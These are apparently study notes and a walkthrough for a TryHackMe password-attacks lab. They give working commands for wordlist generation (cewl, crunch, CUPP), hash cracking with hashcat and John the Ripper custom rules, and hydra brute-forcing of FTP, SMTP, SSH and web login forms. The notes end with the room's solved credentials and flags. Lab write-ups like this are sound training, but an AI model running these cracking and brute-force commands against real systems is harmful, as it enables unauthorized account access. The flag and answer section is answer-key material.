Passwords: used to authenticate individuals to access computer systems or applications -prevents an authorized access Dictionary or wordlist: a collection of passwords -passwords with low complexity are easy to guess -good complexity password: 8+ characters = numbers + upper and lowercase letters + special characters
Password Attacking Techniques
Password Cracking: technique used for discovering passwords from encrypted or hashed data to plaintext data, performed locally = hard detection Password Guessing: multiple login attempts, web-based system requires new request to be sent for each attempt = easy detection
Password Profiling #1
Default Passwords: set by manufacturers with products and equipment for switches, firewalls, routers eg. admin: admin or admin: 123456 etc -target device such as Tomcat. admin:admin or tomcat:admin https://cirt.net/passwords https://default-password.info/ https://datarecovery.com/rd/default-passwords/
Weak Passwords https://github.com/danielmiessler/SecLists/tree/master/Passwords
Leaked Passwords https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
combine wordlists cat file1.txt file2.txt file3.txt > combined_list.txt sort combined_list.txt | uniq -u > cleaned_combined_list.txt
Customized wordlists -cewl used to effectively crawl a website and extract strings or keywords cewl -w list.txt -d 5 -m 5 http://example.com -w: write contents to a file -m 5: gather strings that are 5 characters or more -d 5: depth level of web crawling/spidering (default 2) http://example.com: url used
Generate usernames from enumerated names git clone https://github.com/therodri2/username_generator.git python3 username_generator.py - users.txt
Keyspace Tecnique and CUPP
Crunch: powerful tool for creating an offline wordlist -specify min, max and options cruch 2 2 01234abcd -o crunch.txt -generated two character combinations of the numbers and letters provided -specify a character set @: lower case alpha characters ,: upper case alpha characters %: numeric characters ^: special characters including space
CUPP - Common User Password Profiler -automatic and interactive tool written in python for creating wordlists -enter specific details such as birthdate, petname, company name etc -1337/leet mode - substitute letters with numbers eg. a with 4 and i with 1 git clone https://github.com/Mebus/cupp.git python3 cupp.py -h
Offline Attacks
Dictionary Attack -used to guess passwords by using well-known words or phrases -relies on pre-gathered wordlists -use hashcat
-identify type of hash with hashid or hash-identifier hash-identifier f806fc5a2a0d5ba2471600758452799c hashid f806fc5a2a0d5ba2471600758452799c hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c rockyou.txt
-brute force -?d - 1 digit hashcat -a 3 -m 0 e48e13207341b6bffb7fb1622282247b ?d?d?d?d
Offline Attacks
Rule-Based -aka hybrid attacks -rules are applied to create pw within guidelines
john the ripper /john.conf Lists.Rules - shows all the rules john —wordlist=pw-list.txt —rules=best64 —stdout | wc -l wc -l: count lines john produced
Custom Rules
sudo vi /etc/john/john.conf [List.Rules:THM-Password-Attacks] Az - single word from original wordlist using -p “[0-9]” - append single digit from 0-9 ”[!@#$] - append special character
What syntax would you use to create a rule to produce the following: “S[Word]NN where N is Number and S is a symbol of !@? Az”[0-9][0-9]” ^[!@]
Hydra -brute-force network services such as web login pages: FTP, SMTP and SSH
FTP hydra -l ftp -P passlist.txt ftp://10.10.x.x “-l ftp” specify a single username “-L” username wordlist “-P path” - full path of wordlist “ftp://10.10.x.x” - protocol and IP address
SMTP hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v
SSH hydra -L users.txt -P wordlist.txt ssh://10.10.x.x -v
HTTP login pages hydra -l admin -P password.txt 10.10.x.x http-get-form “/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php” -f “http-get-form” - type of HTTP request “login-get/index.php” - path to login page on target webserver “S=” - success conditions “F=” - failed condition - eliminate false positives eg. logout.php is served only when a user is logged in indicating a success in finding the correct password “-f” stop brute-forcing after finding a valid username and password
-
THM{d0abe799f25738ad739c20301aed357b} ftp 10.10.x.x ls cd files get flag.txt -local machine: cat flag.txt
-
!multidisciplinary00 -create wordlist cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ -set custom rule on john the ripper cd /opt/john nano john.conf -got to end and insert [List.Rules:THM-Password-Attacks] Az”[0-9][0-9]” ^[!@] john —wordlist=clinic.lst —rules=THM-Password-Attacks —stdout > passdict.lst hydra -l pittman@clinic.thmredteam.com -P passdict.lst smtp://[IP] -v
-
THM{33c5d4954da881814420f3ba39772644} hydra -l phillips -P clinic.lst [IP] http-get-form “/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php” -f -password: Paracetamol -login: http://[IP]/login-get -Phillips: Paracetamol
-
THM{f8e3750cc0ccbb863f2706a3b2933227} john —wordlist=clinic.lst —rules=Single-Extra —stdout > newlist.lst hydra -l burgess -P newlist.lst [IP] http-post-form “/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php” -f -username: burgess -password: OxytocinnicotyxO -login: http://[IP]/login-post
user: burgess password: Fall2021@
ssh burgess@[IP] -enter password
cd /etc/ cat flag THM{a97a26e86d09388bbea148f4b870277d}